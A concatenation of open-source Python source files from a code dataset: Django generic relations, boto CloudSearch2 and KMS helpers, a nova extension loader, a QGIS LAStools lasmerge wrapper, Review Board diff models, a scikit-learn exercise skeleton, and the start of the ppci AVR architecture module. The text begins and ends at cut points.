# content type, so we use a callable that returns a (fk, class) pair.
def gfk_key(obj):
ct_id = getattr(obj, ct_attname)
if ct_id is None:
return None
else:
model = self.get_content_type(id=ct_id,
using=obj._state.db).model_class()
return (model._meta.pk.get_prep_value(getattr(obj, self.fk_field)),
model)
return (ret_val,
lambda obj: (obj._get_pk_val(), obj.__class__),
gfk_key,
True,
self.cache_attr)
def is_cached(self, instance):
return hasattr(instance, self.cache_attr)
def __get__(self, instance, instance_type=None):
if instance is None:
return self
try:
return getattr(instance, self.cache_attr)
except AttributeError:
rel_obj = None
# Make sure to use ContentType.objects.get_for_id() to ensure that
# lookups are cached (see ticket #5570). This takes more code than
# the naive ``getattr(instance, self.ct_field)``, but has better
# performance when dealing with GFKs in loops and such.
f = self.model._meta.get_field(self.ct_field)
ct_id = getattr(instance, f.get_attname(), None)
if ct_id is not None:
ct = self.get_content_type(id=ct_id, using=instance._state.db)
try:
rel_obj = ct.get_object_for_this_type(pk=getattr(instance, self.fk_field))
except ObjectDoesNotExist:
pass
setattr(instance, self.cache_attr, rel_obj)
return rel_obj
def __set__(self, instance, value):
ct = None
fk = None
if value is not None:
ct = self.get_content_type(obj=value)
fk = value._get_pk_val()
if not self.allow_unsaved_instance_assignment and fk is None:
raise ValueError(
'Cannot assign "%r": "%s" instance isn\'t saved in the database.' %
(value, value._meta.object_name)
)
setattr(instance, self.ct_field, ct)
setattr(instance, self.fk_field, fk)
setattr(instance, self.cache_attr, value)
class GenericRel(ForeignObjectRel):
"""
Used by GenericRelation to store information about the relation.
"""
def __init__(self, field, to, related_name=None, related_query_name=None, limit_choices_to=None):
super(GenericRel, self).__init__(
field, to,
related_name=related_query_name or '+',
related_query_name=related_query_name,
limit_choices_to=limit_choices_to,
on_delete=DO_NOTHING,
)
class GenericRelation(ForeignObject):
"""
Provide a reverse to a relation created by a GenericForeignKey.
"""
# Field flags
auto_created = False
many_to_many = False
many_to_one = False
one_to_many = True
one_to_one = False
rel_class = GenericRel
def __init__(self, to, object_id_field='object_id', content_type_field='content_type',
for_concrete_model=True, related_query_name=None, limit_choices_to=None, **kwargs):
kwargs['rel'] = self.rel_class(
self, to,
related_query_name=related_query_name,
limit_choices_to=limit_choices_to,
)
kwargs['blank'] = True
kwargs['editable'] = False
kwargs['serialize'] = False
# This construct is somewhat of an abuse of ForeignObject. This field
# represents a relation from pk to object_id field. But, this relation
# isn't direct, the join is generated reverse along foreign key. So,
# the from_field is object_id field, to_field is pk because of the
# reverse join.
super(GenericRelation, self).__init__(
to, from_fields=[object_id_field], to_fields=[], **kwargs)
self.object_id_field_name = object_id_field
self.content_type_field_name = content_type_field
self.for_concrete_model = for_concrete_model
def check(self, **kwargs):
errors = super(GenericRelation, self).check(**kwargs)
errors.extend(self._check_generic_foreign_key_existence())
return errors
def _check_generic_foreign_key_existence(self):
target = self.remote_field.model
if isinstance(target, ModelBase):
fields = target._meta.virtual_fields
if any(isinstance(field, GenericForeignKey) and
field.ct_field == self.content_type_field_name and
field.fk_field == self.object_id_field_name
for field in fields):
return []
else:
return [
checks.Error(
("The GenericRelation defines a relation with the model "
"'%s.%s', but that model does not have a GenericForeignKey.") % (
target._meta.app_label, target._meta.object_name
),
hint=None,
obj=self,
id='contenttypes.E004',
)
]
else:
return []
def resolve_related_fields(self):
self.to_fields = [self.model._meta.pk.name]
return [(self.remote_field.model._meta.get_field(self.object_id_field_name), self.model._meta.pk)]
def get_path_info(self):
opts = self.remote_field.model._meta
target = opts.pk
return [PathInfo(self.model._meta, opts, (target,), self.remote_field, True, False)]
def get_reverse_path_info(self):
opts = self.model._meta
from_opts = self.remote_field.model._meta
return [PathInfo(from_opts, opts, (opts.pk,), self, not self.unique, False)]
def get_choices_default(self):
return super(GenericRelation, self).get_choices(include_blank=False)
def value_to_string(self, obj):
qs = getattr(obj, self.name).all()
return smart_text([instance._get_pk_val() for instance in qs])
def contribute_to_class(self, cls, name, **kwargs):
kwargs['virtual_only'] = True
super(GenericRelation, self).contribute_to_class(cls, name, **kwargs)
self.model = cls
setattr(cls, self.name, ReverseGenericRelatedObjectsDescriptor(self.remote_field))
def set_attributes_from_rel(self):
pass
def get_internal_type(self):
return "ManyToManyField"
def get_content_type(self):
"""
Return the content type associated with this field's model.
"""
return ContentType.objects.get_for_model(self.model,
for_concrete_model=self.for_concrete_model)
def get_extra_restriction(self, where_class, alias, remote_alias):
field = self.remote_field.model._meta.get_field(self.content_type_field_name)
contenttype_pk = self.get_content_type().pk
cond = where_class()
lookup = field.get_lookup('exact')(field.get_col(remote_alias), contenttype_pk)
cond.add(lookup, 'AND')
return cond
def bulk_related_objects(self, objs, using=DEFAULT_DB_ALIAS):
"""
Return all objects related to ``objs`` via this ``GenericRelation``.
"""
return self.remote_field.model._base_manager.db_manager(using).filter(**{
"%s__pk" % self.content_type_field_name: ContentType.objects.db_manager(using).get_for_model(
self.model, for_concrete_model=self.for_concrete_model).pk,
"%s__in" % self.object_id_field_name: [obj.pk for obj in objs]
})
class ReverseGenericRelatedObjectsDescriptor(ForeignRelatedObjectsDescriptor):
"""
Accessor to the related objects manager on the one-to-many relation created
by GenericRelation.
In the example::
class Post(Model):
comments = GenericRelation(Comment)
``post.comments`` is a ReverseGenericRelatedObjectsDescriptor instance.
"""
@cached_property
def related_manager_cls(self):
return create_generic_related_manager(
self.rel.model._default_manager.__class__,
self.rel,
)
def create_generic_related_manager(superclass, rel):
"""
Factory function to create a manager that subclasses another manager
(generally the default manager of a given model) and adds behaviors
specific to generic relations.
"""
class GenericRelatedObjectManager(superclass):
def __init__(self, instance=None):
super(GenericRelatedObjectManager, self).__init__()
self.instance = instance
self.model = rel.model
content_type = ContentType.objects.db_manager(instance._state.db).get_for_model(
instance, for_concrete_model=rel.field.for_concrete_model)
self.content_type = content_type
qn = connection.ops.quote_name
join_cols = rel.field.get_joining_columns(reverse_join=True)[0]
self.source_col_name = qn(join_cols[0])
self.target_col_name = qn(join_cols[1])
self.content_type_field_name = rel.field.content_type_field_name
self.object_id_field_name = rel.field.object_id_field_name
self.prefetch_cache_name = rel.field.attname
self.pk_val = instance._get_pk_val()
self.core_filters = {
'%s__pk' % self.content_type_field_name: content_type.id,
self.object_id_field_name: self.pk_val,
}
def __call__(self, **kwargs):
# We use **kwargs rather than a kwarg argument to enforce the
# `manager='manager_name'` syntax.
manager = getattr(self.model, kwargs.pop('manager'))
manager_class = create_generic_related_manager(manager.__class__, rel)
return manager_class(instance=self.instance)
do_not_call_in_templates = True
def __str__(self):
return repr(self)
def get_queryset(self):
try:
return self.instance._prefetched_objects_cache[self.prefetch_cache_name]
except (AttributeError, KeyError):
db = self._db or router.db_for_read(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).get_queryset().using(db).filter(**self.core_filters)
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is None:
queryset = super(GenericRelatedObjectManager, self).get_queryset()
queryset._add_hints(instance=instances[0])
queryset = queryset.using(queryset._db or self._db)
query = {
'%s__pk' % self.content_type_field_name: self.content_type.id,
'%s__in' % self.object_id_field_name: set(obj._get_pk_val() for obj in instances)
}
# We (possibly) need to convert object IDs to the type of the
# instances' PK in order to match up instances:
object_id_converter = instances[0]._meta.pk.to_python
return (queryset.filter(**query),
lambda relobj: object_id_converter(getattr(relobj, self.object_id_field_name)),
lambda obj: obj._get_pk_val(),
False,
self.prefetch_cache_name)
def add(self, *objs):
db = router.db_for_write(self.model, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
for obj in objs:
if not isinstance(obj, self.model):
raise TypeError("'%s' instance expected" % self.model._meta.object_name)
setattr(obj, self.content_type_field_name, self.content_type)
setattr(obj, self.object_id_field_name, self.pk_val)
obj.save()
add.alters_data = True
def remove(self, *objs, **kwargs):
if not objs:
return
bulk = kwargs.pop('bulk', True)
self._clear(self.filter(pk__in=[o.pk for o in objs]), bulk)
remove.alters_data = True
def clear(self, **kwargs):
bulk = kwargs.pop('bulk', True)
self._clear(self, bulk)
clear.alters_data = True
def _clear(self, queryset, bulk):
db = router.db_for_write(self.model, instance=self.instance)
queryset = queryset.using(db)
if bulk:
# `QuerySet.delete()` creates its own atomic block which
# contains the `pre_delete` and `post_delete` signal handlers.
queryset.delete()
else:
with transaction.atomic(using=db, savepoint=False):
for obj in queryset:
obj.delete()
_clear.alters_data = True
def set(self, objs, **kwargs):
# Force evaluation of `objs` in case it's a queryset whose value
# could be affected by `manager.clear()`. Refs #19816.
objs = tuple(objs)
clear = kwargs.pop('clear', False)
db = router.db_for_write(self.model, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
if clear:
self.clear()
self.add(*objs)
else:
old_objs = set(self.using(db).all())
new_objs = []
for obj in objs:
if obj in old_objs:
old_objs.remove(obj)
else:
new_objs.append(obj)
self.remove(*old_objs)
self.add(*new_objs)
set.alters_data = True
def create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).create(**kwargs)
create.alters_data = True
def get_or_create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).get_or_create(**kwargs)
get_or_create.alters_data = True
def update_or_create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).update_or_create(**kwargs)
update_or_create.alters_data = True
return GenericRelatedObjectManager
| bsd-3-clause |
pratikmallya/hue | desktop/core/ext-py/boto-2.38.0/boto/cloudsearch2/document.py | 136 | 11630 | # Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import boto.exception
from boto.compat import json
import requests
import boto
from boto.cloudsearchdomain.layer1 import CloudSearchDomainConnection
class SearchServiceException(Exception):
pass
class CommitMismatchError(Exception):
# Let's do some extra work and let the user handle errors on his/her own.
errors = None
class EncodingError(Exception):
"""
Content sent for Cloud Search indexing was incorrectly encoded.
This usually happens when a document is marked as unicode but non-unicode
characters are present.
"""
pass
class ContentTooLongError(Exception):
"""
Content sent for Cloud Search indexing was too long
This will usually happen when documents queued for indexing add up to more
than the limit allowed per upload batch (5MB)
"""
pass
class DocumentServiceConnection(object):
"""
A CloudSearch document service.
The DocumentServiceConection is used to add, remove and update documents in
CloudSearch. Commands are uploaded to CloudSearch in SDF (Search Document
Format).
To generate an appropriate SDF, use :func:`add` to add or update documents,
as well as :func:`delete` to remove documents.
Once the set of documents is ready to be index, use :func:`commit` to send
the commands to CloudSearch.
If there are a lot of documents to index, it may be preferable to split the
generation of SDF data and the actual uploading into CloudSearch. Retrieve
the current SDF with :func:`get_sdf`. If this file is the uploaded into S3,
it can be retrieved back afterwards for upload into CloudSearch using
:func:`add_sdf_from_s3`.
The SDF is not cleared after a :func:`commit`. If you wish to continue
using the DocumentServiceConnection for another batch upload of commands,
you will need to :func:`clear_sdf` first to stop the previous batch of
commands from being uploaded again.
"""
def __init__(self, domain=None, endpoint=None):
self.domain = domain
self.endpoint = endpoint
if not self.endpoint:
self.endpoint = domain.doc_service_endpoint
self.documents_batch = []
self._sdf = None
# Copy proxy settings from connection and check if request should be signed
self.proxy = {}
self.sign_request = False
if self.domain and self.domain.layer1:
if self.domain.layer1.use_proxy:
self.proxy = {'http': self.domain.layer1.get_proxy_url_with_auth()}
self.sign_request = getattr(self.domain.layer1, 'sign_request', False)
if self.sign_request:
# Create a domain connection to send signed requests
layer1 = self.domain.layer1
self.domain_connection = CloudSearchDomainConnection(
host=self.endpoint,
aws_access_key_id=layer1.aws_access_key_id,
aws_secret_access_key=layer1.aws_secret_access_key,
region=layer1.region,
provider=layer1.provider
)
def add(self, _id, fields):
"""
Add a document to be processed by the DocumentService
The document will not actually be added until :func:`commit` is called
:type _id: string
:param _id: A unique ID used to refer to this document.
:type fields: dict
:param fields: A dictionary of key-value pairs to be uploaded .
"""
d = {'type': 'add', 'id': _id, 'fields': fields}
self.documents_batch.append(d)
def delete(self, _id):
"""
Schedule a document to be removed from the CloudSearch service
The document will not actually be scheduled for removal until
:func:`commit` is called
:type _id: string
:param _id: The unique ID of this document.
"""
d = {'type': 'delete', 'id': _id}
self.documents_batch.append(d)
def get_sdf(self):
"""
Generate the working set of documents in Search Data Format (SDF)
:rtype: string
:returns: JSON-formatted string of the documents in SDF
"""
return self._sdf if self._sdf else json.dumps(self.documents_batch)
def clear_sdf(self):
"""
Clear the working documents from this DocumentServiceConnection
This should be used after :func:`commit` if the connection will be
reused for another set of documents.
"""
self._sdf = None
self.documents_batch = []
def add_sdf_from_s3(self, key_obj):
"""
Load an SDF from S3
Using this method will result in documents added through
:func:`add` and :func:`delete` being ignored.
:type key_obj: :class:`boto.s3.key.Key`
:param key_obj: An S3 key which contains an SDF
"""
#@todo:: (lucas) would be nice if this could just take an s3://uri..."
self._sdf = key_obj.get_contents_as_string()
def _commit_with_auth(self, sdf, api_version):
return self.domain_connection.upload_documents(sdf, 'application/json')
def _commit_without_auth(self, sdf, api_version):
url = "http://%s/%s/documents/batch" % (self.endpoint, api_version)
# Keep-alive is automatic in a post-1.0 requests world.
session = requests.Session()
session.proxies = self.proxy
adapter = requests.adapters.HTTPAdapter(
pool_connections=20,
pool_maxsize=50,
max_retries=5
)
session.mount('http://', adapter)
session.mount('https://', adapter)
resp = session.post(url, data=sdf, headers={'Content-Type': 'application/json'})
return resp
def commit(self):
"""
Actually send an SDF to CloudSearch for processing
If an SDF file has been explicitly loaded it will be used. Otherwise,
documents added through :func:`add` and :func:`delete` will be used.
:rtype: :class:`CommitResponse`
:returns: A summary of documents added and deleted
"""
sdf = self.get_sdf()
if ': null' in sdf:
boto.log.error('null value in sdf detected. This will probably '
'raise 500 error.')
index = sdf.index(': null')
boto.log.error(sdf[index - 100:index + 100])
api_version = '2013-01-01'
if self.domain and self.domain.layer1:
api_version = self.domain.layer1.APIVersion
if self.sign_request:
r = self._commit_with_auth(sdf, api_version)
else:
r = self._commit_without_auth(sdf, api_version)
return CommitResponse(r, self, sdf, signed_request=self.sign_request)
class CommitResponse(object):
"""Wrapper for response to Cloudsearch document batch commit.
:type response: :class:`requests.models.Response`
:param response: Response from Cloudsearch /documents/batch API
:type doc_service: :class:`boto.cloudsearch2.document.DocumentServiceConnection`
:param doc_service: Object containing the documents posted and methods to
retry
:raises: :class:`boto.exception.BotoServerError`
:raises: :class:`boto.cloudsearch2.document.SearchServiceException`
:raises: :class:`boto.cloudsearch2.document.EncodingError`
:raises: :class:`boto.cloudsearch2.document.ContentTooLongError`
"""
def __init__(self, response, doc_service, sdf, signed_request=False):
self.response = response
self.doc_service = doc_service
self.sdf = sdf
self.signed_request = signed_request
if self.signed_request:
self.content = response
else:
_body = response.content.decode('utf-8')
try:
self.content = json.loads(_body)
except:
boto.log.error('Error indexing documents.\nResponse Content:\n{0}'
'\n\nSDF:\n{1}'.format(_body, self.sdf))
raise boto.exception.BotoServerError(self.response.status_code, '',
body=_body)
self.status = self.content['status']
if self.status == 'error':
self.errors = [e.get('message') for e in self.content.get('errors',
[])]
for e in self.errors:
if "Illegal Unicode character" in e:
raise EncodingError("Illegal Unicode character in document")
elif e == "The Content-Length is too long":
raise ContentTooLongError("Content was too long")
else:
self.errors = []
self.adds = self.content['adds']
self.deletes = self.content['deletes']
self._check_num_ops('add', self.adds)
self._check_num_ops('delete', self.deletes)
def _check_num_ops(self, type_, response_num):
"""Raise exception if number of ops in response doesn't match commit
:type type_: str
:param type_: Type of commit operation: 'add' or 'delete'
:type response_num: int
:param response_num: Number of adds or deletes in the response.
:raises: :class:`boto.cloudsearch2.document.CommitMismatchError`
"""
commit_num = len([d for d in self.doc_service.documents_batch
if d['type'] == type_])
if response_num != commit_num:
if self.signed_request:
boto.log.debug(self.response)
else:
boto.log.debug(self.response.content)
# There will always be a commit mismatch error if there is any
# errors on cloudsearch. self.errors gets lost when this
# CommitMismatchError is raised. Whoever is using boto has no idea
# why their commit failed. They can't even notify the user of the
# cause by parsing the error messages from amazon. So let's
# attach the self.errors to the exceptions if we already spent
# time and effort collecting them out of the response.
exc = CommitMismatchError(
'Incorrect number of {0}s returned. Commit: {1} Response: {2}'
.format(type_, commit_num, response_num)
)
exc.errors = self.errors
raise exc
| apache-2.0 |
NewpTone/stacklab-nova | debian/python-nova/usr/share/pyshared/nova/api/openstack/volume/contrib/__init__.py | 8 | 1284 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Contrib contains extensions that are shipped with nova.
It can't be called 'extensions' because that causes namespacing problems.
"""
from nova.api.openstack import extensions
from nova import flags
from nova.openstack.common import log as logging
FLAGS = flags.FLAGS
LOG = logging.getLogger(__name__)
def standard_extensions(ext_mgr):
extensions.load_standard_extensions(ext_mgr, LOG, __path__, __package__)
def select_extensions(ext_mgr):
extensions.load_standard_extensions(ext_mgr, LOG, __path__, __package__,
FLAGS.osapi_volume_ext_list)
| apache-2.0 |
dracos/QGIS | python/plugins/processing/algs/lidar/lastools/lasmerge.py | 2 | 3710 | # -*- coding: utf-8 -*-
"""
***************************************************************************
lasmerge.py
---------------------
Date : September 2013
Copyright : (C) 2013 by Martin Isenburg
Email : martin near rapidlasso point com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Martin Isenburg'
__date__ = 'September 2013'
__copyright__ = '(C) 2013, Martin Isenburg'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from LAStoolsUtils import LAStoolsUtils
from LAStoolsAlgorithm import LAStoolsAlgorithm
from processing.core.parameters import ParameterFile
class lasmerge(LAStoolsAlgorithm):
FILE2 = "FILE2"
FILE3 = "FILE3"
FILE4 = "FILE4"
FILE5 = "FILE5"
FILE6 = "FILE6"
FILE7 = "FILE7"
def defineCharacteristics(self):
self.name = "lasmerge"
self.group = "LAStools"
self.addParametersVerboseGUI()
self.addParametersFilesAreFlightlinesGUI()
self.addParametersApplyFileSourceIdGUI()
self.addParametersPointInputGUI()
self.addParameter(ParameterFile(lasmerge.FILE2, self.tr("2nd file")))
self.addParameter(ParameterFile(lasmerge.FILE3, self.tr("3rd file")))
self.addParameter(ParameterFile(lasmerge.FILE4, self.tr("4th file")))
self.addParameter(ParameterFile(lasmerge.FILE5, self.tr("5th file")))
self.addParameter(ParameterFile(lasmerge.FILE6, self.tr("6th file")))
self.addParameter(ParameterFile(lasmerge.FILE7, self.tr("7th file")))
self.addParametersPointOutputGUI()
self.addParametersAdditionalGUI()
def processAlgorithm(self, progress):
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasmerge")]
self.addParametersVerboseCommands(commands)
self.addParametersPointInputCommands(commands)
file2 = self.getParameterValue(lasmerge.FILE2)
if file2 is not None:
commands.append("-i")
commands.append(file2)
file3 = self.getParameterValue(lasmerge.FILE3)
if file3 is not None:
commands.append("-i")
commands.append(file3)
file4 = self.getParameterValue(lasmerge.FILE4)
if file4 is not None:
commands.append("-i")
commands.append(file4)
file5 = self.getParameterValue(lasmerge.FILE5)
if file5 is not None:
commands.append("-i")
commands.append(file5)
file6 = self.getParameterValue(lasmerge.FILE6)
if file6 is not None:
commands.append("-i")
commands.append(file6)
file7 = self.getParameterValue(lasmerge.FILE7)
if file7 is not None:
commands.append("-i")
commands.append(file7)
self.addParametersFilesAreFlightlinesCommands(commands)
self.addParametersApplyFileSourceIdCommands(commands)
self.addParametersPointOutputCommands(commands)
self.addParametersAdditionalCommands(commands)
LAStoolsUtils.runLAStools(commands, progress)
| gpl-2.0 |
chazy/reviewboard | reviewboard/diffviewer/models.py | 1 | 3892 | from datetime import datetime
from django.db import models
from django.utils.translation import ugettext_lazy as _
from djblets.util.fields import Base64Field
from reviewboard.scmtools.models import Repository
class FileDiff(models.Model):
"""
A diff of a single file.
This contains the patch and information needed to produce original and
patched versions of a single file in a repository.
"""
MODIFIED = 'M'
DELETED = 'D'
STATUSES = (
(MODIFIED, _('Modified')),
(DELETED, _('Deleted')),
)
diffset = models.ForeignKey('DiffSet',
related_name='files',
verbose_name=_("diff set"))
source_file = models.CharField(_("source file"), max_length=1024)
dest_file = models.CharField(_("destination file"), max_length=1024)
source_revision = models.CharField(_("source file revision"),
max_length=512)
dest_detail = models.CharField(_("destination file details"),
max_length=512)
diff = Base64Field(_("diff"), db_column="diff_base64")
binary = models.BooleanField(_("binary file"), default=False)
parent_diff = Base64Field(_("parent diff"), db_column="parent_diff_base64",
blank=True)
status = models.CharField(_("status"), max_length=1, choices=STATUSES)
@property
def deleted(self):
return self.status == 'D'
def __unicode__(self):
return u"%s (%s) -> %s (%s)" % (self.source_file, self.source_revision,
self.dest_file, self.dest_detail)
class DiffSet(models.Model):
"""
A revisioned collection of FileDiffs.
"""
name = models.CharField(_('name'), max_length=256)
revision = models.IntegerField(_("revision"))
timestamp = models.DateTimeField(_("timestamp"), default=datetime.now)
basedir = models.CharField(_('base directory'), max_length=256,
blank=True, default='')
history = models.ForeignKey('DiffSetHistory', null=True,
related_name="diffsets",
verbose_name=_("diff set history"))
repository = models.ForeignKey(Repository, related_name="diffsets",
verbose_name=_("repository"))
diffcompat = models.IntegerField(
_('differ compatibility version'),
default=0,
help_text=_("The diff generator compatibility version to use. "
"This can and should be ignored."))
def save(self, **kwargs):
"""
Saves this diffset.
This will set an initial revision of 1 if this is the first diffset
in the history, and will set it to on more than the most recent
diffset otherwise.
"""
if self.revision == 0 and self.history != None:
if self.history.diffsets.count() == 0:
# Start on revision 1. It's more human-grokable.
self.revision = 1
else:
self.revision = self.history.diffsets.latest().revision + 1
super(DiffSet, self).save()
def __unicode__(self):
return u"[%s] %s r%s" % (self.id, self.name, self.revision)
class Meta:
get_latest_by = 'revision'
ordering = ['revision', 'timestamp']
class DiffSetHistory(models.Model):
"""
A collection of diffsets.
This gives us a way to store and keep track of multiple revisions of
diffsets belonging to an object.
"""
name = models.CharField(_('name'), max_length=256)
timestamp = models.DateTimeField(_("timestamp"), default=datetime.now)
def __unicode__(self):
return u'Diff Set History (%s revisions)' % self.diffsets.count()
class Meta:
verbose_name_plural = "Diff set histories"
| mit |
tpodowd/boto | boto/kms/__init__.py | 113 | 1640 | # Copyright (c) 2014 Amazon.com, Inc. or its affiliates.
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.regioninfo import RegionInfo, get_regions
def regions():
"""
Get all available regions for the AWS Key Management Service.
:rtype: list
:return: A list of :class:`boto.regioninfo.RegionInfo`
"""
from boto.kms.layer1 import KMSConnection
return get_regions('kms', connection_cls=KMSConnection)
def connect_to_region(region_name, **kw_params):
for region in regions():
if region.name == region_name:
return region.connect(**kw_params)
return None
| mit |
sarahgrogan/scikit-learn | doc/tutorial/text_analytics/skeletons/exercise_01_language_train_model.py | 254 | 2005 | """Build a language detector model
The goal of this exercise is to train a linear classifier on text features
that represent sequences of up to 3 consecutive characters so as to be
recognize natural languages by using the frequencies of short character
sequences as 'fingerprints'.
"""
# Author: Olivier Grisel <olivier.grisel@ensta.org>
# License: Simplified BSD
import sys
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import Perceptron
from sklearn.pipeline import Pipeline
from sklearn.datasets import load_files
from sklearn.cross_validation import train_test_split
from sklearn import metrics
# The training data folder must be passed as first argument
languages_data_folder = sys.argv[1]
dataset = load_files(languages_data_folder)
# Split the dataset in training and test set:
docs_train, docs_test, y_train, y_test = train_test_split(
dataset.data, dataset.target, test_size=0.5)
# TASK: Build a an vectorizer that splits strings into sequence of 1 to 3
# characters instead of word tokens
# TASK: Build a vectorizer / classifier pipeline using the previous analyzer
# the pipeline instance should stored in a variable named clf
# TASK: Fit the pipeline on the training set
# TASK: Predict the outcome on the testing set in a variable named y_predicted
# Print the classification report
print(metrics.classification_report(y_test, y_predicted,
target_names=dataset.target_names))
# Plot the confusion matrix
cm = metrics.confusion_matrix(y_test, y_predicted)
print(cm)
#import pylab as pl
#pl.matshow(cm, cmap=pl.cm.jet)
#pl.show()
# Predict the result on some short new sentences:
sentences = [
u'This is a language detection test.',
u'Ceci est un test de d\xe9tection de la langue.',
u'Dies ist ein Test, um die Sprache zu erkennen.',
]
predicted = clf.predict(sentences)
for s, p in zip(sentences, predicted):
print(u'The language of "%s" is "%s"' % (s, dataset.target_names[p]))
| bsd-3-clause |
windelbouwman/ppci-mirror | ppci/arch/avr/arch.py | 1 | 11632 | """ AVR architecture.
See for good documentation about AVR ABI:
- https://gcc.gnu.org/wiki/avr-gcc
The stack grows downwards in AVR. The stack pointer points to the current
empty stack slot. This is somewhat confusing, because on other machines
the stack pointer points to the latests pushed byte.
The stack frame is layout as follows:
+----+-----------------------------+
| 90 | Incoming arguments |
| 89 | for previous frame |
+----+-----------------------------+
| 88 | return address |
| 87 | |
+----+-----------------------------+
| 86 | |
| 85 | saved registers previous |
| 84 | frame |
+----+-----------------------------+
| 83 | |
| 82 | stack for previous frame |
| 81 | |
+----+-----------------------------+
| 80 | |
| 79 | Incoming arguments for |
| 78 | current frame |
+----+-----------------------------+
| 77 | return address |
| 76 | |
+----+-----------------------------+
| 75 | |
| 74 | saved registers current |
| 73 | frame |
+----+-----------------------------+
| 72 | |
| 71 | |
| 70 | Stack for the current frame |
| 69 | | <- pointed to by Y
+----+-----------------------------+
| 68 | | <- stack pointer
Stack grows
||
/
"""
import io
from ... import ir
from ...binutils.assembler import BaseAssembler
from ..arch import Architecture
from ..arch_info import ArchInfo, TypeInfo
from ..generic_instructions import Label, Alignment, SectionInstruction
from ..generic_instructions import RegisterUseDef
from ..data_instructions import data_isa
from ..data_instructions import Db
from ..runtime import get_runtime_files
from ..stack import FramePointerLocation
from . import registers, instructions
from .instructions import avr_isa
from .instructions import Push, Pop, Mov, Call, In, Movw, Ret, Adiw
from .registers import AvrRegister, Register
from .registers import AvrWordRegister
from .registers import r0, PC
from .registers import r8, r9, r10, r11, r12, r13, r14, r15
from .registers import r16, r17, r18, r19, r20, r21, r22, r23
from .registers import r24, r25, W, Y, Z
from .registers import caller_save, callee_save
from .registers import get16reg, register_classes, gdb_registers
class AvrArch(Architecture):
""" Avr architecture description. """
name = "avr"
def __init__(self, options=None):
super().__init__(options=options)
self.isa = avr_isa + data_isa
self.assembler = BaseAssembler()
self.assembler.gen_asm_parser(self.isa)
# TODO: make it possible to choose between 16 and 8 bit int type size
# with an option -mint8 every integer is 8 bits wide.
self.info = ArchInfo(
type_infos={
ir.i8: TypeInfo(1, 1),
ir.u8: TypeInfo(1, 1),
ir.i16: TypeInfo(2, 2),
ir.u16: TypeInfo(2, 2),
ir.f32: TypeInfo(4, 4),
ir.f64: TypeInfo(8, 8),
"int": ir.i16,
"ptr": ir.u16,
ir.ptr: ir.u16,
},
register_classes=register_classes,
)
self.fp = Y
self.fp_location = FramePointerLocation.BOTTOM
self.gdb_registers = gdb_registers
self.gdb_pc = PC
self.caller_save = caller_save
def get_runtime(self):
from ...api import asm, c3c, link
obj1 = asm(io.StringIO(asm_rt_src), self)
c3_sources = get_runtime_files(["sdiv", "smul"])
